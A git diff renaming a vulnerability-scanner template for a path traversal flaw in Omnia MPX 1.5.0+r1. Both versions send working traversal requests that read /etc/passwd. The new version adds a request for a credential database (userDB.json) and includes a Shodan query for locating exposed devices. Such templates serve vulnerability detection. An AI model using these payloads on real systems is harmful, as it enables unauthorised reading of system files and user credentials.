Update and rename mpx-lfi.yaml to omnia-mpx-lfi.yaml
parent
b74d093f74
commit
3a75420965
|
@ -1,30 +0,0 @@
|
|||
id: mpx-lfi
|
||||
|
||||
info:
|
||||
name: Omnia MPX 1.5.0+r1 - Path Traversal
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
Omnia MPX 1.5.0+r1 is vulnerable to Path Traversal.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/50996
|
||||
metadata:
|
||||
shodan-query: http.html:"Omnia MPX"
|
||||
verified: "true"
|
||||
tags: lfi,unauthenticated,omnia
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /logs/downloadMainLog?fname=../../../../../../..//etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,35 @@
|
|||
id: omnia-mpx-lfi
|
||||
|
||||
info:
|
||||
name: Omnia MPX 1.5.0+r1 - Path Traversal
|
||||
author: arafatansari,ritikchaddha
|
||||
severity: high
|
||||
description: |
|
||||
Omnia MPX 1.5.0+r1 is vulnerable to Path Traversal.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/50996
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"Omnia MPX"
|
||||
tags: omnia,mpx,lfi,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd"
|
||||
- "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"username":'
|
||||
- '"password":'
|
||||
- '"id":'
|
||||
condition: and
|
Loading…
Reference in New Issue